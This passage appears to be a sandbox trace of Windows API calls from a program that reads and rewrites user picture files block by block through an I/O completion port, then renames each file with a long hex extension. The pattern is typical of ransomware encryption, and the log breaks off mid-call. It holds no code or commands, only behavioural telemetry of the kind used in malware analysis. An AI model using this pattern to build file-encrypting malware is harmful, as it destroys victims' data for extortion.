[0167.835] RtlInterlockedCompareExchange64 () returned 0x1 [0167.835] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0167.838] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.839] RtlInterlockedCompareExchange64 () returned 0x0 [0167.839] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.424] ReadFile (in: hFile=0x598, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0168.424] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.432] WriteFile (in: hFile=0x598, lpBuffer=0x746a2f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x744a1c0) returned 1 [0168.441] RtlInterlockedCompareExchange64 () returned 0xffffffff [0168.441] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.617] ReadFile (in: hFile=0x5b8, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0168.618] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.618] WriteFile (in: hFile=0x5b8, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0168.623] RtlInterlockedCompareExchange64 () returned 0x0 [0168.632] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.641] ReadFile (in: hFile=0x5a4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x2400, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0168.642] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.643] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x73e00f8, ReturnLength=0x422f7cc) returned 0x0 [0168.644] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\2OyC.png", lpString2=".8A2BB77E23C54E42607AD5C7AECE17DD460DC9E4FE6DFD4E8DD1040CCB564527" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\2OyC.png.8A2BB77E23C54E42607AD5C7AECE17DD460DC9E4FE6DFD4E8DD1040CCB564527") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\2OyC.png.8A2BB77E23C54E42607AD5C7AECE17DD460DC9E4FE6DFD4E8DD1040CCB564527" [0168.644] GetProcessHeap () returned 0x270000 [0168.644] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x14e) returned 0x42fbc80 [0168.644] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x422f7bc, FileInformation=0x42fbc80, Length=0x14e, FileInformationClass=0xa) returned 0x0 [0168.646] CloseHandle (hObject=0x5a4) returned 1 [0168.647] GetProcessHeap () returned 0x270000 [0168.648] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0168.648] RtlInterlockedCompareExchange64 () returned 0x1 [0168.648] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.651] ReadFile (in: hFile=0x5a4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0168.652] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.653] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x73e00f8, ReturnLength=0x422f7cc) returned 0x0 [0168.654] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\FaEqNR6CU6.gif", lpString2=".8379E43389DE39E1E3C211A2ED666727F815DB2BC20137F2AB3BF1DA4AB2963E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\FaEqNR6CU6.gif.8379E43389DE39E1E3C211A2ED666727F815DB2BC20137F2AB3BF1DA4AB2963E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\FaEqNR6CU6.gif.8379E43389DE39E1E3C211A2ED666727F815DB2BC20137F2AB3BF1DA4AB2963E" [0168.654] GetProcessHeap () returned 0x270000 [0168.655] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x15a) returned 0x750a170 [0168.655] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x422f7bc, FileInformation=0x750a170, Length=0x15a, FileInformationClass=0xa) returned 0x0 [0168.656] CloseHandle (hObject=0x5a4) returned 1 [0168.657] GetProcessHeap () returned 0x270000 [0168.658] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0168.658] RtlInterlockedCompareExchange64 () returned 0x1 [0168.658] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.662] ReadFile (in: hFile=0x5a4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0168.664] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.665] NtQueryObject (in: Handle=0x5a4, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x73e00f8, ReturnLength=0x422f7cc) returned 0x0 [0168.667] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\tvjxlZJHorKt41fxL.jpg", lpString2=".AEB6D46964AF18E86987A34454AF4AF788F1EDC073C32B0104C45129573BC153" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\tvjxlZJHorKt41fxL.jpg.AEB6D46964AF18E86987A34454AF4AF788F1EDC073C32B0104C45129573BC153") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\91wJYhTsR\\tvjxlZJHorKt41fxL.jpg.AEB6D46964AF18E86987A34454AF4AF788F1EDC073C32B0104C45129573BC153" [0168.667] GetProcessHeap () returned 0x270000 [0168.667] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x168) returned 0x7421688 [0168.667] NtSetInformationFile (FileHandle=0x5a4, IoStatusBlock=0x422f7bc, FileInformation=0x7421688, Length=0x168, FileInformationClass=0xa) returned 0x0 [0168.668] CloseHandle (hObject=0x5a4) returned 1 [0168.669] GetProcessHeap () returned 0x270000 [0168.671] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0168.671] RtlInterlockedCompareExchange64 () returned 0x1 [0168.671] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.675] ReadFile (in: hFile=0x5a4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0168.676] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.676] WriteFile (in: hFile=0x5a4, lpBuffer=0x7400180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x73e0048) returned 1 [0168.677] RtlInterlockedCompareExchange64 () returned 0x0 [0168.677] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.691] WriteFile (in: hFile=0x5b8, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x6600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0168.693] RtlInterlockedCompareExchange64 () returned 0x0 [0168.693] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.705] WriteFile (in: hFile=0x5b8, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0168.706] RtlInterlockedCompareExchange64 () returned 0x0 [0168.706] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0168.737] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x422f7cc | out: ObjectInformation=0x76900b8, ReturnLength=0x422f7cc) returned 0x0 [0168.738] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\u OMCWlP.gif", lpString2=".736ABE822081F27C8DDC250D2702D9402526B9EACB61ED042EDE076D1776EA11" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\u OMCWlP.gif.736ABE822081F27C8DDC250D2702D9402526B9EACB61ED042EDE076D1776EA11") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\iV8-Qr39PzJA__E0\\u OMCWlP.gif.736ABE822081F27C8DDC250D2702D9402526B9EACB61ED042EDE076D1776EA11" [0168.738] GetProcessHeap () returned 0x270000 [0168.738] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x142) returned 0x4258168 [0168.738] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x422f7bc, FileInformation=0x4258168, Length=0x142, FileInformationClass=0xa) returned 0x0 [0168.739] CloseHandle (hObject=0x5b8) returned 1 [0169.007] GetProcessHeap () returned 0x270000 [0169.008] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0169.008] RtlInterlockedCompareExchange64 () returned 0x1 [0169.008] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.008] ReadFile (in: hFile=0x594, lpBuffer=0x752a588, nNumberOfBytesToRead=0x3400, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a450 | out: lpBuffer=0x752a588*, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a450) returned 1 [0169.009] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.009] ReadFile (in: hFile=0x5a8, lpBuffer=0x75526e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75325a8 | out: lpBuffer=0x75526e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75325a8) returned 1 [0169.009] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.010] ReadFile (in: hFile=0x5c4, lpBuffer=0x757a838, nNumberOfBytesToRead=0x7000, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a700 | out: lpBuffer=0x757a838*, lpNumberOfBytesRead=0x0, lpOverlapped=0x755a700) returned 1 [0169.010] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.010] ReadFile (in: hFile=0x5c8, lpBuffer=0x76d9030, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8ef8 | out: lpBuffer=0x76d9030*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76b8ef8) returned 1 [0169.011] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.011] ReadFile (in: hFile=0x5d0, lpBuffer=0x7701188, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e1050 | out: lpBuffer=0x7701188*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76e1050) returned 1 [0169.011] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.014] ReadFile (in: hFile=0x5d4, lpBuffer=0x77292e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x77091a8 | out: lpBuffer=0x77292e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x77091a8) returned 1 [0169.015] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.015] ReadFile (in: hFile=0x5ac, lpBuffer=0x7600180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048 | out: lpBuffer=0x7600180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x75e0048) returned 1 [0169.016] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.016] ReadFile (in: hFile=0x4a8, lpBuffer=0x76292e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x76091a8 | out: lpBuffer=0x76292e0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x76091a8) returned 1 [0169.017] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.017] ReadFile (in: hFile=0x5e4, lpBuffer=0x7651438, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7631300 | out: lpBuffer=0x7651438*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7631300) returned 1 [0169.018] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.018] ReadFile (in: hFile=0x5dc, lpBuffer=0x7679590, nNumberOfBytesToRead=0x7000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7659458 | out: lpBuffer=0x7679590*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7659458) returned 1 [0169.019] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.019] ReadFile (in: hFile=0x5e0, lpBuffer=0x77a1298, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7781160 | out: lpBuffer=0x77a1298*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7781160) returned 1 [0169.019] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.020] ReadFile (in: hFile=0x304, lpBuffer=0x77c93f0, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x77a92b8 | out: lpBuffer=0x77c93f0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x77a92b8) returned 1 [0169.020] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.020] ReadFile (in: hFile=0x5c0, lpBuffer=0x77f1548, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x77d1410 | out: lpBuffer=0x77f1548*, lpNumberOfBytesRead=0x0, lpOverlapped=0x77d1410) returned 1 [0169.021] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.021] ReadFile (in: hFile=0x5bc, lpBuffer=0x78196a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x77f9568 | out: lpBuffer=0x78196a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x77f9568) returned 1 [0169.022] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.022] ReadFile (in: hFile=0x5e8, lpBuffer=0x78417f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x78216c0 | out: lpBuffer=0x78417f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x78216c0) returned 1 [0169.023] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.023] ReadFile (in: hFile=0x5ec, lpBuffer=0x7869950, nNumberOfBytesToRead=0x3800, lpNumberOfBytesRead=0x0, lpOverlapped=0x7849818 | out: lpBuffer=0x7869950*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7849818) returned 1 [0169.024] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.024] ReadFile (in: hFile=0x5f0, lpBuffer=0x7891aa8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7871970 | out: lpBuffer=0x7891aa8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7871970) returned 1 [0169.025] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.025] ReadFile (in: hFile=0x5f4, lpBuffer=0x78b9c00, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7899ac8 | out: lpBuffer=0x78b9c00*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7899ac8) returned 1 [0169.026] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.026] ReadFile (in: hFile=0x5b4, lpBuffer=0x78e1d58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x78c1c20 | out: lpBuffer=0x78e1d58*, lpNumberOfBytesRead=0x0, lpOverlapped=0x78c1c20) returned 1 [0169.027] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.027] ReadFile (in: hFile=0x5d8, lpBuffer=0x7909eb0, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x78e9d78 | out: lpBuffer=0x7909eb0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x78e9d78) returned 1 [0169.028] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0169.028] WriteFile (in: hFile=0x594, lpBuffer=0x752a588*, nNumberOfBytesToWrite=0x3400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a450 | out: lpBuffer=0x752a588*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x750a450) returned 1 [0169.280] RtlInterlockedCompareExchange64 () returned 0x1 [0169.280] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x422f7d8, lpCompletionKey=0x422f7d4, lpOverlapped=0x422f7d0) returned 1 [0170.956] ReadFile (in: hFile=0x58c, lpBuffer=0x752a588, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a450 | out: lpBuffer=0x752a588*, lpNumberOfBytesRead=0x0, lpOverlapped=0x750a450) returned 1 [0170.968] GetQueuedCompletionStatus (in: 